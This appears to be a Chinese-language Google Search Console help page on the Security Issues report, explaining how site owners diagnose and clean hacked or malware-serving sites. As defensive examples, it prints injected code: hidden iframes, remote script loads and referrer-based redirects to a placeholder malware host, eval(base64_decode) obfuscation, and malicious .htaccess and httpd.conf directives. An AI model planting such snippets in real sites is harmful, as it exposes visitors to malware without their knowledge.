安全性問題報告

如果 Google 經過評估後判定您的網站遭到入侵,或網站涉及可能對訪客和其電腦造成損害的情況,安全性問題報告將顯示 Google 的調查結果。有害的情況包括網路詐騙攻擊,或是在使用者的電腦安裝惡意軟體或垃圾軟體。

在搜尋結果中,受到安全性問題影響的網頁或網站會顯示警告標籤;當使用者造訪這類網站時,瀏覽器也會顯示插頁式警告網頁。

開啟安全性問題報告

 

什麼是安全性問題?

安全性問題可分為以下幾種類別:

  • 遭入侵的內容:這是指有心人士藉由安全漏洞,在未經授權的情況下置入您網站中的內容。為了保護使用者,Google 會盡可能在搜尋結果中排除遭入侵的內容。瞭解詳情
  • 惡意軟體或垃圾軟體:凡是刻意危害裝置或使用者、涉及欺騙或非預期行為,或者對使用者造成負面影響的軟體都屬於此類。瞭解詳情
  • 社交工程:這類內容會誘騙訪客從事危險行為,例如提供機密資訊或下載軟體。瞭解詳情

我的網站是否有安全性問題?

如果您的網站有安全性問題,這份報告的頂端會顯示您網站安全性問題的總數量。

如果您的網站沒有安全性問題,您會看到綠色的勾號和相對應的說明訊息。

但是我最近才剛買下這個網站!

如果您最近買下的網站原本就有安全性問題,請修正安全性問題報告中列出的問題,然後透過重審要求向我們說明您最近才剛買下這個網站,而且該網站現已符合《Google 網站管理員指南》的規範。

哪些網頁會受到影響?

只要展開問題說明,即可查看受影響示例網址的清單。這份清單不一定包含所有受影響的網址,只是顯示您網站上受所選問題影響的網頁示例。有時您可能會發現未列出示例網址的安全性問題;這並不表示沒有任何網頁受到影響,而是系統基於某些因素無法產生示例。

問題詳細資料會顯示系統首次在網站偵測到問題的日期,同時附上簡短說明和可供您進一步瞭解問題的連結。

修正問題

如何修正網站上的安全性問題:

  1. 在安全性問題報告中展開問題說明。
  2. 詳閱問題說明,然後點選 [瞭解詳情] 連結,查看詳細資訊和修正問題的步驟 (「瞭解詳情」連結會指向本頁下方提及的相關說明)。
  3. 利用詳細資料部分提供的受影響網頁示例,排解及修正問題。這份清單不一定包含所有受影響的網址,只是顯示您網站上受目前所選問題影響的網頁示例。您可能會發現未列出示例網址的安全性問題;這並不表示沒有任何網頁受到影響,而是系統基於某些因素無法產生示例。
  4. 針對「網站上的所有網頁」修正問題。如果您只是選擇性修正部分網頁上的問題,這些網頁還是無法出現在搜尋結果中。
  5. 如果報告中列有多個影響網站的安全性問題,請全數修正。
  6. 測試修正後的結果。
  7. 為「所有網頁」修正報告列出的「所有問題」後,在安全性問題報告中選取 [要求審查],並在重審要求中說明您的修正方式。理想的要求內容應符合下列三個條件:
    • 明確說明網站的品質問題。
    • 說明修正問題時所採取的行動。
    • 記錄您的行動所獲得的成果。
  8. 重審程序可能需要一至兩週才能完成,我們會透過電子郵件通知您重審進度。送出要求後,您會收到案件已進入審查程序的確認郵件。在我們對處理中的要求做出最終判定前,請勿重複提交要求。

進行重審需要多少時間?

最多需要一至兩週。我們收到您的要求後,會透過電子郵件通知您已開始進行審查;審查結束後,您也會收到電子郵件通知。

在我們對處理中的要求做出判定前,請勿重複提交要求。如果未修正問題便提交重審要求,可能導致您需要較長的等待期才能再次提交要求,Google 甚至可能將您的網站標示為屢次違規網站

安全性問題清單

以下列出可能發生的安全性問題,以及如何修正各項問題的相關資訊。問題類別可能為錯誤 或警告

不實網頁

您網站上的內容會誘騙訪客從事危險行為,例如提供機密資訊或下載軟體。如有網頁經常顯示不實內容,Google 安全瀏覽服務會在網路使用者造訪該網頁前發出警告,以保護使用者。

如果符合以下任一情況,即屬於不實網頁:

  • 仿效可信實體 (例如使用者的裝置、瀏覽器或網站本身) 的行為和外觀;或者
  • 試圖誘騙使用者從事只會對可信實體做出的行為,例如透露密碼、撥電話給技術支援小組或下載軟體。

這種不實內容稱為「社交工程」。您可以進一步瞭解社交工程查看不實網頁的示例

修正問題

1. 確認問題

前往示例網頁尋找不實內容。您可以使用網址檢查工具,分別以行動版和電腦版檢視模式瀏覽您的網站。

2. 修正您的網頁

修正所有涉及社交工程的網頁。如果您認為 Google 安全瀏覽服務對網頁的歸類有誤,請前往這個頁面回報問題

3. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

不實內嵌資源

您網站上的不實廣告或內嵌資源會誘騙訪客從事危險行為,例如提供機密資訊或下載垃圾軟體。嵌入網頁中的各種資源 (例如圖片、其他第三方元件或廣告) 都可能含有不實內容。如有網頁經常顯示不實內容,Google 安全瀏覽服務會在網路使用者造訪該網頁前發出警告,以保護使用者。

有些不實內容是在代管網頁上直接向使用者顯示;也有一些情況是代管網站不會顯示任何廣告,但會透過彈出式視窗、背後彈出式視窗或其他類型的重新導向方式,將使用者導向含有不實內容的網頁。無論是上述哪一種情況,這類內嵌內容都將導致代管網頁違反政策規定。

這種不實內容稱為「社交工程」。您可以進一步瞭解社交工程查看不實內嵌資源的示例

修正問題

1. 確認問題

前往示例網頁尋找不實內容,並確認您網站的網頁上沒有任何不實的廣告、圖片或其他內嵌的第三方資源。請注意,廣告聯播網可能會在您網站的網頁上以輪播形式顯示眾多廣告。因此,您可能需要重新整理網頁幾次,才能確定有沒有出現任何社交工程廣告。部分廣告在行動裝置和電腦上的顯示型態可能不同。您可以使用網址檢查工具,分別以行動版和電腦版檢視模式瀏覽您的網站。

2. 移除不實廣告或資源

檢查您網站上的第三方資源,確認您網站的網頁上沒有任何不實的廣告、圖片或其他內嵌的第三方資源,並修正所有涉及社交工程的網頁。

3. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

惡意軟體
心懷不軌的駭客已透過惡意軟體感染您的網站,或以您的網站代管惡意軟體。只要軟體或行動應用程式會刻意危害電腦、行動裝置、這些裝置執行的軟體或其使用者,就屬於惡意軟體。

1. 判定這個問題可否由您自行修正

如要修正網站的惡意軟體問題,您必須能夠解讀及理解程式碼,可能還須具備針對網站設定網路伺服器的相關知識。如果您認為這個問題已超出個人能力所及,請參閱建立支援小組一文,瞭解如何尋求協助。

2. 診斷惡意軟體問題並加以修正

惡意軟體的種類繁多。請參閱以下各節,嘗試診斷特定惡意軟體類型並加以修正。請注意,您的網站有可能受到多種惡意軟體感染,因此您必須徹底診斷及清理網站。

惡意軟體類型:伺服器設定

說明

駭客已入侵您的網站,且很有可能已竄改您伺服器的設定檔,藉此將使用者從運作正常的網站重新導向至惡意軟體攻擊性網站。一般而言,伺服器設定檔可供網站管理員指定網址重新導向,以便讓訪客前往網站上的特定網頁或目錄。以 Apache 伺服器為例,指的就是 .htaccess 和 httpd.conf 檔案。

修正問題

1. 確認問題

前往安全性問題報告中列出的部分示例網址。

請避免使用瀏覽器直接查看網站上遭感染的網頁。

惡意軟體常會利用瀏覽器的漏洞進行散佈,所以在瀏覽器中開啟遭惡意軟體感染的網頁,可能會使您的電腦受損。除此之外,駭客也可能使用偽裝技術來隱藏垃圾內容,令網站擁有者無法察覺。

您可以透過下列兩種方式,更安全地在電腦上瀏覽內容:

  • 使用網址檢查工具,嘗試從 Google 的角度檢視您的網頁。這項工具非常實用,因為多數駭客所做的變更只有在 Google 機器的面前才會現形。舉例來說,駭客可能會在您的網站中植入只有在參照網址是 Google 的情況下才會顯示的連結。
  • 使用 cURLWget 透過指令列執行 HTTP 要求 (例如擷取網頁)。這些免費工具可協助診斷重新導向,甚至可指定參照網址或使用者代理程式的資訊。駭客通常會鎖定特定的使用者代理程式或參照網址進行攻擊,一來可以躲避偵測,二來則是為了選出更容易下手的目標;您可以藉由上述工具偽裝成這類目標。如果您的要求無法引出濫用行為,可以試試看不同的參照網址 (例如來自大型網站的連結,或是其他搜尋引擎)。舉例來說,如要模擬 Windows 電腦使用者利用 Google 搜尋結果的連結前往 www.example.com/page.html,建議您使用類似下方的 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

如果網頁已遭受「伺服器設定」類型的惡意軟體感染,該網頁傳送的回應可能含有下列標頭:

...
< HTTP/1.1 301 Moved Permanently
< Date: Sun, 24 Feb 2013 21:06:45 GMT
< Server: Apache
< Location: http://<malware-attack-site>/index.html
< Content-Length: 253
...

2. 清理受「伺服器設定」類型惡意軟體感染的網站

透過殼層/終端機存取登入伺服器 (您可視情況讓網站處於離線狀態),並檢視相關的伺服器設定檔。網站上可能會有多個伺服器設定檔遭到入侵。請檢查這些檔案是否含有不必要的指令 (例如重新導向),駭客可藉此竄改您的網站設定,將訪客重新導向至會受到惡意軟體攻擊的未知網站。舉例來說,.htaccess 檔案中可能會顯示下列重新導向指令:

RewriteEngine On 
RewriteCond %{HTTP_REFERER} .*google.* 
RewriteRule ^third-page.html($|/) http://<malware-site>/index.html [R=301]

 

其他注意事項:

  • 請務必徹底檢查整個檔案,以免駭客為了不讓您發現,刻意將程式碼加在檔案結尾。
  • 盡可能調查駭客專為持續更新 .htaccess 檔案所建立的 Cron 工作。Cron 工作可能會列在數個位置,包括 /etc/crontab (以及許多 /etc/cron* 目錄) 和 /var/spool/cron
  • 參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。
惡意軟體類型:SQL 植入

說明

駭客可能已入侵您網站的資料庫。舉例來說,駭客可能已透過程式將惡意程式碼植入資料庫表格的每筆記錄中;如此一來,當伺服器載入需要擷取資料庫資訊的網頁時,系統會將惡意程式碼嵌入該網頁的內容中,可能進一步對網站的訪客造成損害。

修正問題

1. 確認問題

透過指令列對受影響的網址執行一些查詢,並檢查回應中是否有 SQL 攻擊字詞,例如「iframe」或「eval」。

請避免使用瀏覽器直接查看網站上遭感染的網頁。

惡意軟體常會利用瀏覽器的漏洞進行散佈,所以在瀏覽器中開啟遭惡意軟體感染的網頁,可能會使您的電腦受損。除此之外,駭客也可能使用偽裝技術來隱藏垃圾內容,令網站擁有者無法察覺。

您可以透過下列兩種方式,更安全地在電腦上瀏覽內容:

  • 使用網址檢查工具,嘗試從 Google 的角度檢視您的網頁。這項工具非常實用,因為多數駭客所做的變更只有在 Google 機器的面前才會現形。舉例來說,駭客可能會在您的網站中植入只有在參照網址是 Google 的情況下才會顯示的連結。
  • 使用 cURLWget 透過指令列執行 HTTP 要求 (例如擷取網頁)。這些免費工具可協助診斷重新導向,甚至可指定參照網址或使用者代理程式的資訊。駭客通常會鎖定特定的使用者代理程式或參照網址進行攻擊,一來可以躲避偵測,二來則是為了選出更容易下手的目標;您可以藉由上述工具偽裝成這類目標。如果您的要求無法引出濫用行為,可以試試看不同的參照網址 (例如來自大型網站的連結,或是其他搜尋引擎)。舉例來說,如要模擬 Windows 電腦使用者利用 Google 搜尋結果的連結前往 www.example.com/page.html,建議您使用類似下方的 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

接著,登入您的資料庫伺服器,或使用工具 (例如 phpMyAdmin) 查看資料庫。如果您是使用 Wget 或 cURL,請透過 Wget 或 cURL 將網頁原始碼中顯示的損害與實際的資料庫項目建立關聯。舉例來說,如果您發現網頁含有危險的 iframe,可以執行 SQL 查詢搜尋 iframe 程式碼。例如:

SELECT * FROM blog_posts WHERE post_text LIKE '%>iframe%'; 

您也可以查看伺服器的資料庫記錄和錯誤檔案,確認是否有錯誤或異常的活動,例如一般使用者認為不尋常的 SQL 指令。

2. 清理您的網站

當您準備開始清理網站時,可以選擇更新每一筆受到感染的資料庫記錄,或是復原到最後一個已知資料庫備份。

其他注意事項:

  • 參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。
惡意軟體類型:程式碼植入

說明

您網站上的網頁遭到竄改並植入惡意程式碼,例如透過 iframe 導向惡意軟體攻擊性網站。

修正問題

1. 確認問題

前往安全性問題報告中列出的受感染網址,並檢查回應的 HTML 是否有惡意程式碼。

請避免使用瀏覽器直接查看網站上遭感染的網頁。

惡意軟體常會利用瀏覽器的漏洞進行散佈,所以在瀏覽器中開啟遭惡意軟體感染的網頁,可能會使您的電腦受損。除此之外,駭客也可能使用偽裝技術來隱藏垃圾內容,令網站擁有者無法察覺。

您可以透過下列兩種方式,更安全地在電腦上瀏覽內容:

  • 使用網址檢查工具,嘗試從 Google 的角度檢視您的網頁。這項工具非常實用,因為多數駭客所做的變更只有在 Google 機器的面前才會現形。舉例來說,駭客可能會在您的網站中植入只有在參照網址是 Google 的情況下才會顯示的連結。
  • 使用 cURLWget 透過指令列執行 HTTP 要求 (例如擷取網頁)。這些免費工具可協助診斷重新導向,甚至可指定參照網址或使用者代理程式的資訊。駭客通常會鎖定特定的使用者代理程式或參照網址進行攻擊,一來可以躲避偵測,二來則是為了選出更容易下手的目標;您可以藉由上述工具偽裝成這類目標。如果您的要求無法引出濫用行為,可以試試看不同的參照網址 (例如來自大型網站的連結,或是其他搜尋引擎)。舉例來說,如要模擬 Windows 電腦使用者利用 Google 搜尋結果的連結前往 www.example.com/page.html,建議您使用類似下方的 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

以下是一些惡意程式碼的示例:

  • 載入惡意網站的 iframe:
    <iframe frameborder="0" height="0" src="http://<malware-site>/path/file" 
      style="display:none" width="0"></iframe>
  • 呼叫及執行攻擊性網站指令碼的 JavaScript 或其他指令碼語言:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • 將瀏覽器重新導向至攻擊性網站的指令碼:
    <script>
      if (document.referrer.match(/google\.com/)) {
        window.location("http://<malware-site>/");
      }
    </script>
  • 以矇騙手法躲避偵測的惡意程式碼:
    eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));
  • 專門用於隨機將有害程式碼寫入正常指令碼的共用目標檔:
    #httpd.conf modified by the hacker
    LoadModule harmful_module modules/mod_harmful.so
    AddModule mod_harmful.c

在網站顯示的程式碼中調查所有可能造成危害的部分。建議您可以搜尋「iframe」這類字詞,藉此找出 iframe 程式碼。此外,「script」、「eval」和「unescape」等也都是實用的關鍵字。舉例來說,您可以針對 Unix 系統中的所有檔案搜尋「iframe」:

$grep -irn "iframe" ./ | less

2. 清理您的網站

當您準備開始清理網站時,可以選擇利用最後一個正常備份替換受影響的檔案,或是將各個網頁中植入的程式碼連同所有相關編碼函式或檔案一起移除。如果您修改過伺服器設定檔,則可能必須重新啟動網路伺服器才能讓變更生效。

其他注意事項:

  • 參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。
惡意軟體類型:錯誤範本

說明

用於顯示錯誤訊息的範本 (例如「404 找不到檔案」) 遭駭客竄改設定,導致散佈惡意軟體。如此一來,即使網址不在您的網站上,攻擊者也能對該網址發動攻擊。

修正問題

1. 確認問題

針對不在您網站上或擲回另一種錯誤的網頁提出要求,並檢查回應是否來自其他網站;如果不是,就表示該網頁含有惡意軟體。

請避免使用瀏覽器直接查看網站上遭感染的網頁。

惡意軟體常會利用瀏覽器的漏洞進行散佈,所以在瀏覽器中開啟遭惡意軟體感染的網頁,可能會使您的電腦受損。除此之外,駭客也可能使用偽裝技術來隱藏垃圾內容,令網站擁有者無法察覺。

您可以透過下列兩種方式,更安全地在電腦上瀏覽內容:

  • 使用網址檢查工具,嘗試從 Google 的角度檢視您的網頁。這項工具非常實用,因為多數駭客所做的變更只有在 Google 機器的面前才會現形。舉例來說,駭客可能會在您的網站中植入只有在參照網址是 Google 的情況下才會顯示的連結。
  • 使用 cURLWget 透過指令列執行 HTTP 要求 (例如擷取網頁)。這些免費工具可協助診斷重新導向,甚至可指定參照網址或使用者代理程式的資訊。駭客通常會鎖定特定的使用者代理程式或參照網址進行攻擊,一來可以躲避偵測,二來則是為了選出更容易下手的目標;您可以藉由上述工具偽裝成這類目標。如果您的要求無法引出濫用行為,可以試試看不同的參照網址 (例如來自大型網站的連結,或是其他搜尋引擎)。舉例來說,如要模擬 Windows 電腦使用者利用 Google 搜尋結果的連結前往 www.example.com/page.html,建議您使用類似下方的 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. 清理您的網站

登入您的網路伺服器,並針對伺服器設定檔搜尋錯誤網頁指令。舉例來說,.htaccess 檔案中會宣告 Apache 網路伺服器適用的錯誤範本。以下這個示例 .htaccess 檔案項目會從惡意網站擷取 404 錯誤網頁:

ErrorDocument 404 http://<malware-site>/index.html 

當您準備開始清理網站時,可以選擇利用已知的正常備份替換 .htaccess 檔案,或是刪除現有 .htaccess 檔案中不必要的 ErrorDocument 指令。如果您的網站上確實有錯誤檔案存在,請一併予以清除。最後,請重新啟動網路伺服器,確保所有變更都能生效。

其他注意事項:

  • 參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。
惡意軟體類型:跨網站惡意軟體

說明

網站會試圖從另一個已知含有惡意內容的網站載入內容。在這個情況下,Chrome 瀏覽器的插頁會顯示以下圖片:

cross-site malware warning

修正問題​

  1. 如要確認問題,請瀏覽安全性問題報告中列出的幾個示例網址。如果問題是來自跨網站惡意軟體,瀏覽器插頁中應該會顯示上述圖片。
  2. 瀏覽器會透過警告向您說明可疑內容所在的網域。請針對瀏覽器警告中列出的受檢舉網站移除所有參照。
  3. 如果您發現網站中的網頁在不知不覺間出現受檢舉網站上的內容,則表示目前的問題更為嚴重,您的網站非常有可能已遭到入侵。遇到上述任一情況時,Google 建議您參考遭入侵網站協助說明的標準修復流程,瞭解如何隔離您的網站、評估損害及進行清理。
  4. 將網站上的社交工程內容全部移除後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。
  5. 如果您曾主動在網頁中納入某個合法網站的內容,但該網站後來遭到檢舉,而您希望在該網站的清理作業完成後重新提供其中內容,則可利用 Google 安全瀏覽診斷網頁 (http://www.google.com/safebrowsing/diagnostic?site=www.example.com) 來監控該網站的狀態。合法網站的擁有者通常很快就會完成清理作業。
其他類型的惡意軟體

另外還有多種惡意軟體可能影響您的網站。請參閱網站基礎知識網站,進一步瞭解診斷及修正其他入侵類型的提示。修正您的網站後,請務必提交審查要求。

3. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

駭客入侵類型:程式碼植入

駭客已入侵您的網站,並將惡意程式碼植入您的網頁。駭客會在網頁開啟時執行各項操作,例如重新導向至惡意網站,或在您的瀏覽器執行加密貨幣採集軟體。

1. 判定這個問題可否由您自行修正

如要自行修正問題,請參閱建立支援小組一文,瞭解您可能需要採取的行動,或如何在問題超出您能力所及的情況下尋求協助。

2. 確認問題

請避免使用瀏覽器直接查看網站上遭感染的網頁。

惡意軟體常會利用瀏覽器的漏洞進行散佈,所以在瀏覽器中開啟遭惡意軟體感染的網頁,可能會使您的電腦受損。除此之外,駭客也可能使用偽裝技術來隱藏垃圾內容,令網站擁有者無法察覺。

您可以透過下列兩種方式,更安全地在電腦上瀏覽內容:

  • 使用網址檢查工具,嘗試從 Google 的角度檢視您的網頁。這項工具非常實用,因為多數駭客所做的變更只有在 Google 機器的面前才會現形。舉例來說,駭客可能會在您的網站中植入只有在參照網址是 Google 的情況下才會顯示的連結。
  • 使用 cURLWget 透過指令列執行 HTTP 要求 (例如擷取網頁)。這些免費工具可協助診斷重新導向,甚至可指定參照網址或使用者代理程式的資訊。駭客通常會鎖定特定的使用者代理程式或參照網址進行攻擊,一來可以躲避偵測,二來則是為了選出更容易下手的目標;您可以藉由上述工具偽裝成這類目標。如果您的要求無法引出濫用行為,可以試試看不同的參照網址 (例如來自大型網站的連結,或是其他搜尋引擎)。舉例來說,如要模擬 Windows 電腦使用者利用 Google 搜尋結果的連結前往 www.example.com/page.html,建議您使用類似下方的 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

駭客可能會將惡意程式碼直接植入網站的 HTML 檔案 (例如新增 JavaScript 重新導向) 或產生網站內容的檔案 (例如 PHP 檔案)。

請擷取報告中列出的遭入侵網頁,並檢查回覆。駭客可以利用多種不同技術將訪客從您的網站重新導向到他們的網站,可能的手法包括:

  • 重新導向:​
    • 標頭重新導向:駭客可以竄改伺服器的設定檔,將訪客重新導向至其他網站。一般而言,伺服器設定檔可供網站管理員指定網址重新導向,以便讓訪客前往網站上的特定網頁或目錄。以 Apache 伺服器為例,指的就是 .htaccess 和 httpd.conf 檔案。
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • JavaScript 重新導向:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • 從其他網站載入的惡意 JavaScript:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • 以矇騙手法躲避偵測的惡意程式碼:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

請在您的回應和網站中搜尋可疑的程式碼,實用的搜尋字詞包括「search」、「eval」、「base64_decode」和「unescape」。

3. 清理您的網站

當您準備開始清理網站時,可以選擇利用最後一個正常備份替換受影響的檔案,或是自行移除垃圾資訊相關內容。

其他注意事項:

  • 參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。

4. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

駭客入侵類型:內容植入

駭客已將與垃圾資訊相關的連結或文字新增至您網站上的網頁。植入的內容可能包含藥物字詞,或是其他與網站內容無關的垃圾資訊。

以下是駭客竄改網站的典型做法:

  • 取得伺服器上未受保護目錄的存取權。具體而言,您可能在不經意間開放了目錄的權限。
  • 利用網站在軟體執行方面的安全漏洞,例如內容管理系統。舉例來說,您執行的 Drupal、Joomla! 或 WordPress 可能是不安全的較舊版本。
  • 入侵您在網站上使用的第三方外掛程式,例如訪客計數器。

1. 判定這個問題可否由您自行修正

如要自行修正問題,請參閱建立支援小組一文,瞭解您可能需要採取的行動,或如何在問題超出您能力所及的情況下尋求協助。

2. 確認問題

請避免使用瀏覽器直接查看網站上遭感染的網頁。

惡意軟體常會利用瀏覽器的漏洞進行散佈,所以在瀏覽器中開啟遭惡意軟體感染的網頁,可能會使您的電腦受損。除此之外,駭客也可能使用偽裝技術來隱藏垃圾內容,令網站擁有者無法察覺。

您可以透過下列兩種方式,更安全地在電腦上瀏覽內容:

  • 使用網址檢查工具,嘗試從 Google 的角度檢視您的網頁。這項工具非常實用,因為多數駭客所做的變更只有在 Google 機器的面前才會現形。舉例來說,駭客可能會在您的網站中植入只有在參照網址是 Google 的情況下才會顯示的連結。
  • 使用 cURLWget 透過指令列執行 HTTP 要求 (例如擷取網頁)。這些免費工具可協助診斷重新導向,甚至可指定參照網址或使用者代理程式的資訊。駭客通常會鎖定特定的使用者代理程式或參照網址進行攻擊,一來可以躲避偵測,二來則是為了選出更容易下手的目標;您可以藉由上述工具偽裝成這類目標。如果您的要求無法引出濫用行為,可以試試看不同的參照網址 (例如來自大型網站的連結,或是其他搜尋引擎)。舉例來說,如要模擬 Windows 電腦使用者利用 Google 搜尋結果的連結前往 www.example.com/page.html,建議您使用類似下方的 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

請擷取您網站上的部分網頁,並在回應中搜尋您並未主動新增的可疑內容或連結。舉例來說,您可以搜尋「viagra」(威而鋼) 或「earn money」(賺錢) 等與藥品或垃圾資訊相關的字詞。

3. 清理您的網站

當您準備開始清理網站時,可以選擇利用最後一個正常備份替換受影響的檔案,或是從個別網頁中移除垃圾資訊相關內容。請務必將安全性問題報告中列出的入侵示例全數修正。此外,也請利用「site:」關鍵字透過 Google 搜尋您網站的來源檔案,藉此找出網站上其他可能遭受入侵的網頁。

其他注意事項:

  • 參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。

4. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

駭客入侵類型:網址植入

駭客已在您的網站上建立新網頁,其中通常含有與垃圾資訊相關的字詞或連結。在某些情況下,這些新網頁內含的特定程式碼可能會違背您的意願執行其他操作,例如將您的使用者重新導向其他網站,或是讓您的網路伺服器參與對付其他網站的阻斷服務攻擊。

1. 判定這個問題可否由您自行修正

如要自行修正問題,請參閱建立支援小組一文,瞭解您可能需要採取的行動,或如何在問題超出您能力所及的情況下尋求協助。

2. 確認問題

請避免使用瀏覽器直接查看網站上遭感染的網頁。

惡意軟體常會利用瀏覽器的漏洞進行散佈,所以在瀏覽器中開啟遭惡意軟體感染的網頁,可能會使您的電腦受損。除此之外,駭客也可能使用偽裝技術來隱藏垃圾內容,令網站擁有者無法察覺。

您可以透過下列兩種方式,更安全地在電腦上瀏覽內容:

  • 使用網址檢查工具,嘗試從 Google 的角度檢視您的網頁。這項工具非常實用,因為多數駭客所做的變更只有在 Google 機器的面前才會現形。舉例來說,駭客可能會在您的網站中植入只有在參照網址是 Google 的情況下才會顯示的連結。
  • 使用 cURLWget 透過指令列執行 HTTP 要求 (例如擷取網頁)。這些免費工具可協助診斷重新導向,甚至可指定參照網址或使用者代理程式的資訊。駭客通常會鎖定特定的使用者代理程式或參照網址進行攻擊,一來可以躲避偵測,二來則是為了選出更容易下手的目標;您可以藉由上述工具偽裝成這類目標。如果您的要求無法引出濫用行為,可以試試看不同的參照網址 (例如來自大型網站的連結,或是其他搜尋引擎)。舉例來說,如要模擬 Windows 電腦使用者利用 Google 搜尋結果的連結前往 www.example.com/page.html,建議您使用類似下方的 cURL:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

請查詢報告中列出的示例網址,確認這些網址是否能正常運作。這類網頁可能並非由您建立,因此您必須從網站中移除這些網頁,或清除自動產生網頁的程式碼。請參閱相關說明,瞭解如何在網站上尋找及移除這類網頁

您也可以搜尋「site:」,找出您並未建立的網頁。

  • 對於規模較小的網站,您可以在 Google 搜尋查詢 [site:example.com],查看系統已建立索引的網頁清單,藉此確認是否有任何並非由您建立的網頁。
  • 對於規模較大的網站,您可以利用以下這些較為精確的查詢方式:
    • [site:example.com pharmacy]:列出 example.com 上所有包含「pharmacy」(藥局) 字詞的網頁。您可以將其中的「pharmacy」替換為常見的垃圾資訊相關字詞。
    • [site:example.com/wp-admin/]:列出 WordPress 網站上網站管理員專區中的所有網頁。

3. 清理您的網站

當您準備開始清理網站時,可以選擇利用最後一個正常備份替換受影響的目錄,或者移除垃圾網頁以及駭客用於建立這類網頁的所有檔案或函式。

其他注意事項:

  • 參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。

4. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

有害的下載內容

您的網站提供了 Google 安全瀏覽服務視為惡意軟體或垃圾軟體的下載內容。Chrome 瀏覽器可能會在使用者造訪您的網站時顯示警告。如要讓這類警告不再出現,您必須從網站上移除這些下載內容。

1. 評估問題

如果您是刻意提供這些下載內容,請將這些內容從網站中移除,再進行下文的「要求審查」步驟。

如果您完全不清楚網站上有任何下載內容,表示可能已遭到駭客入侵。您必須修復遭到入侵的網站,並找出其中的下載內容加以移除。

2. 判定這個問題可否由您自行修正

如要自行修正問題,請參閱建立支援小組一文,瞭解您可能需要採取的行動,或如何在問題超出您能力所及的情況下尋求協助。

3. 確認問題

查看您網站上的部分示例網頁,確認其中是否有這類下載內容。

4. 清理您的網站

參閱遭入侵網站協助指南,按照完整流程徹底修正您的網站。這份指南提供了清理作業的相關步驟和提示,有助於防止網站再次遭到入侵。當您準備開始清理網站時,可以選擇利用最後一個正常備份替換受影響的檔案,或是自行移除垃圾資訊相關內容。請使用防毒軟體掃描二進位檔以及您網站代管的其他內容。雖然防毒軟體可以找出多種惡意軟體和垃圾軟體,但仍有一些無法識別的類型。您可以將軟體交由防毒程式或 VirusTotal 等防毒整合服務檢查,藉此瞭解軟體的潛在問題。Google 安全瀏覽服務會根據自身標準來判定程式或二進位檔是否為垃圾軟體或惡意軟體。

5. 確認修正後的結果

確認您的網站已符合垃圾軟體政策規定。

6. 要求審查

確認網站上的問題已獲得修正後,請在安全性問題報告中提出安全性審查要求。審查程序可能需要幾天至幾週的時間。

導向有害下載內容的連結

您網站連結的目標網站會提供 Google 安全瀏覽服務視為惡意軟體或垃圾軟體的下載內容。Chrome 瀏覽器可能會在使用者造訪您的網站時顯示警告。如要讓這類警告不再出現,您必須移除導向有害網站的連結。

1. 評估問題

如果您是刻意提供這些連結,請將這些連結從網站中移除,再進行下文的「要求審查」步驟。

如果您對這些連結完全不知情,表示網站可能已遭到駭客入侵。

2. 判定這個問題可否由您自行修正

